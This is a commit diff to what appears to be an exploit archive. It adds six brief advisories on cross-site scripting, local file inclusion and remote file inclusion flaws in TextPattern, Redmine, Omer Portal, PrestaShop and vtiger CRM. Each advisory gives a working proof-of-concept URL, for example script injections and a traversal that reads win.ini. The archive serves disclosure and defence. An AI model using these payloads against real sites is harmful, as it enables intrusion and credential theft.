Updated 12_20_2014

2014-12-20 04:52:36 +00:00 · 2014-12-20 04:52:36 +00:00 · 2a1c991e8f
commit 2a1c991e8f
parent 9af5846cb9
7 changed files with 60 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32035,3 +32035,9 @@ id,file,description,date,author,platform,type,port
 35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 'admin.php' Local File Include Vulnerability",2011-04-05,"High-Tech Bridge SA",php,webapps,0
 35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 'banners.php' Multiple Local File Include Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0
 35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 'feedparser/feedparser.py' Cross Site Scripting Vulnerability",2011-04-05,fazalmajid,multiple,remote,0
+35571,platforms/php/webapps/35571.txt,"TextPattern 4.2 'index.php' Cross Site Scripting Vulnerability",2011-04-06,"kurdish hackers team",php,webapps,0
+35572,platforms/php/webapps/35572.txt,"Redmine 1.0.1/1.1.1 'projects/hg-hellowword/news/' Cross Site Scripting Vulnerability",2011-04-06,"Mesut Timur",php,webapps,0
+35574,platforms/php/webapps/35574.txt,"vtiger CRM 5.2.1 'sortfieldsjson.php' Local File Include Vulnerability",2011-04-08,"John Leitch",php,webapps,0
+35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 'cms.php' Remote File Include Vulnerability",2011-04-08,KedAns-Dz,php,webapps,0
+35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 'arama_islem.asp' Cross Site Scripting Vulnerability",2011-04-07,"kurdish hackers team",asp,webapps,0
+35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 'vtigerservice.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0
--- a/platforms/asp/webapps/35576.txt
+++ b/platforms/asp/webapps/35576.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47266/info
+
+Omer Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Omer Portal 3.220060425 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/arama_islem.asp?aramadeger=<script>alert(1)</script> 
--- a/platforms/php/webapps/35571.txt
+++ b/platforms/php/webapps/35571.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47182/info
+
+TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+TextPattern 4.2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?q=<script>alert(888)</script> 
--- a/platforms/php/webapps/35572.txt
+++ b/platforms/php/webapps/35572.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47193/info
+
+Redmine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Redmine 1.0.1 and 1.1.1 are vulnerable; other versions may also be affected. 
+
+http://example.com/projects/hg-helloworld/news/[xss] 
--- a/platforms/php/webapps/35574.txt
+++ b/platforms/php/webapps/35574.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47263/info
+
+vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 
--- a/platforms/php/webapps/35575.txt
+++ b/platforms/php/webapps/35575.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47264/info
+
+PrestaShop is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+PrestaShop 1.3.6 and prior are vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/cms.php?rewrited_url=http://[Shell-Path] 
--- a/platforms/php/webapps/35577.txt
+++ b/platforms/php/webapps/35577.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47267/info
+
+vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E